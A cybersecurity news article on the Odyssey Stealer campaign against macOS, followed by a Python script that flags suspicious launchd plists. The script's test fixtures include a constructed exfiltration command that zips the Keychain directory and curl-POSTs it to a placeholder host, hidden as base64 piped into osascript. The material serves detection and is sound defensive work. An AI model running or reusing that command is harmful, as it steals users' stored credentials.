New Wave of Odyssey Stealer Targets macOS Users in Active Cyberattack Campaign

Cybersecurity • February 6, 2026
Source: GBHackers On Security

Companies Mentioned

Microsoft (MSFT), Ledger, Binance, TRON

Why It Matters

The campaign highlights a rapid escalation in macOS‑focused infostealer activity, forcing enterprises and individuals to reassess endpoint protection for Apple devices. Its script‑based delivery and LaunchDaemon persistence raise the bar for threat detection and incident response across the broader cyber‑crime ecosystem.

Key Takeaways

  • Odyssey Stealer now active on macOS across 20+ countries.
  • Uses a fake CAPTCHA “ClickFix” page to deliver the payload.
  • Harvests crypto wallets, browser data, Keychain passwords and files.
  • Persists via a randomly named LaunchDaemon plist and base64‑encoded AppleScript.
  • C2 includes IP 45.46.130.131 and a custom builder panel.

Pulse Analysis

The resurgence of macOS‑targeted malware reflects a strategic shift among cybercriminals who once treated Apple’s ecosystem as a low‑priority target. Odyssey Stealer, a rebranded offshoot of the Poseidon and AMOS stealers, shows how threat actors keep existing stealer codebases in play under new names rather than writing new tooling. By hosting the lure on pages that imitate legitimate download sites and hiding the malicious logic behind a counterfeit CAPTCHA, the group sidesteps download‑based controls (there is no file for a web filter or Gatekeeper to inspect, because the victim types the command into Terminal) and capitalizes on user trust. This evolution underscores the value of threat intelligence that tracks code reuse and attribution patterns across stealer families.

Odyssey’s distribution chain is a textbook example of layered social engineering. Victims land on a fake verification page that fingerprints the operating system before presenting a command‑line snippet to paste into Terminal. The snippet carries a base64‑encoded AppleScript; once decoded and run, it installs the stealer without dropping a conventional binary, reducing its footprint on disk. Persistence is reinforced through a LaunchDaemon plist with a randomly generated name, so the payload survives reboots. The exfiltration routine compresses the stolen data into an out.zip archive and retries curl POST uploads to the command‑and‑control server, riding out temporary network blocks. These techniques complicate forensic analysis and call for endpoint monitoring that can flag anomalous script execution and the resulting network traffic.

For organizations, the rise of Odyssey signals a need to broaden security controls beyond Windows‑centric tooling. EDR on macOS must be tuned to the artifacts this chain produces: new plists written under /Library/LaunchDaemons (which requires administrator rights, so a password prompt in the middle of a “verification” step is itself a red flag), osascript launched from a shell with a base64‑decoded argument, and curl POST requests carrying an archive to an unfamiliar host or a bare IP. User education should stress that no legitimate CAPTCHA ever asks the user to paste a command into Terminal. As threat actors continue to refine cross‑platform stealers, a proactive blend of threat hunting, threat‑intel sharing, and hardened macOS configurations will be essential to keep the growing attack surface in check.
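As an added example (not code from the article or from GBHackers), the following Python script applies the LaunchDaemon, base64 and osascript checks described in the two paragraphs above to launchd plists. The plist paths, the label x7qkd3mz, the hypothetical C2 host c2.example.invalid and the decoded payload are constructed fixtures that mirror the described chain, not artifacts recovered from the Odyssey campaign; on a real host you would feed it the files under /Library/LaunchDaemons and ~/Library/LaunchAgents.

```python
"""Triage launchd plists for ClickFix-style persistence (added example).

Flags plists whose ProgramArguments run osascript, decode base64 on the
command line, or embed a base64 blob that decodes to AppleScript with
curl/out.zip/Keychain exfiltration logic. All sample data is constructed.
"""
import base64
import plistlib
import re
from typing import Dict, List

# Constructed AppleScript payload mirroring the described chain (zip the
# Keychain directory into out.zip, POST it with curl). Hypothetical host.
CONSTRUCTED_PAYLOAD = (
    'do shell script "zip -r /tmp/out.zip ~/Library/Keychains; '
    'curl -X POST -F file=@/tmp/out.zip http://c2.example.invalid/upload"'
)
B64_PAYLOAD = base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode()

# Constructed fixtures: one ordinary vendor daemon and one ClickFix-style
# daemon with a random label that pipes a base64 blob into osascript.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchDaemons/com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
        "StartCalendarInterval": {"Hour": 2, "Minute": 0},
    }),
    "/Library/LaunchDaemons/x7qkd3mz.plist": plistlib.dumps({
        "Label": "x7qkd3mz",
        # macOS base64 decodes with -D (also --decode); GNU base64 uses -d.
        "ProgramArguments": ["/bin/sh", "-c",
                             f"echo {B64_PAYLOAD} | base64 -D | osascript"],
        "RunAtLoad": True,
    }),
}

# Keywords a decoded blob should not contain in a benign daemon.
PAYLOAD_INDICATORS = ("do shell script", "curl", "out.zip", "Keychains", "osascript")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_b64_blobs(text: str) -> List[str]:
    """Return every long base64 run in text that decodes to valid UTF-8."""
    decoded: List[str] = []
    for m in B64_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary content: ignore here
    return decoded


def triage_plist(path: str, raw: bytes) -> Dict[str, object]:
    """Score one launchd plist; two or more findings mark it suspicious."""
    plist = plistlib.loads(raw)
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    cmdline = " ".join(args)
    findings: List[str] = []

    # Heuristic: randomly generated labels lack the reverse-DNS form vendors use.
    if label and "." not in label:
        findings.append(f"non reverse-DNS label {label!r}")
    if "osascript" in cmdline:
        findings.append("runs osascript from ProgramArguments")
    if re.search(r"base64\s+(-d|-D|--decode)", cmdline):
        findings.append("decodes base64 on the command line")
    for blob in decode_b64_blobs(cmdline):
        hits = [k for k in PAYLOAD_INDICATORS if k in blob]
        if hits:
            findings.append("embedded base64 decodes to script using: " + ", ".join(hits))
    # RunAtLoad only matters once something else looks wrong.
    if plist.get("RunAtLoad") and findings:
        findings.append("RunAtLoad set (survives reboot)")
    return {"path": path, "label": label, "findings": findings,
            "suspicious": len(findings) >= 2}


def triage_all(plists: Dict[str, bytes]) -> List[Dict[str, object]]:
    """Triage a mapping of plist path -> raw plist bytes."""
    return [triage_plist(p, raw) for p, raw in plists.items()]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_PLISTS):
        print(("SUSPICIOUS" if r["suspicious"] else "ok").ljust(11), r["path"])
        for f in r["findings"]:
            print("            -", f)
```

Run against the fixtures, the backup daemon produces no findings while the x7qkd3mz daemon is flagged on its label, the osascript invocation, the inline base64 decode, the decoded payload's curl/out.zip/Keychains content and RunAtLoad. The indicators are deliberately narrow to the chain described above; a hunt on real hosts should also cover ~/Library/LaunchAgents and compare results against an allowlist of known vendor labels.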
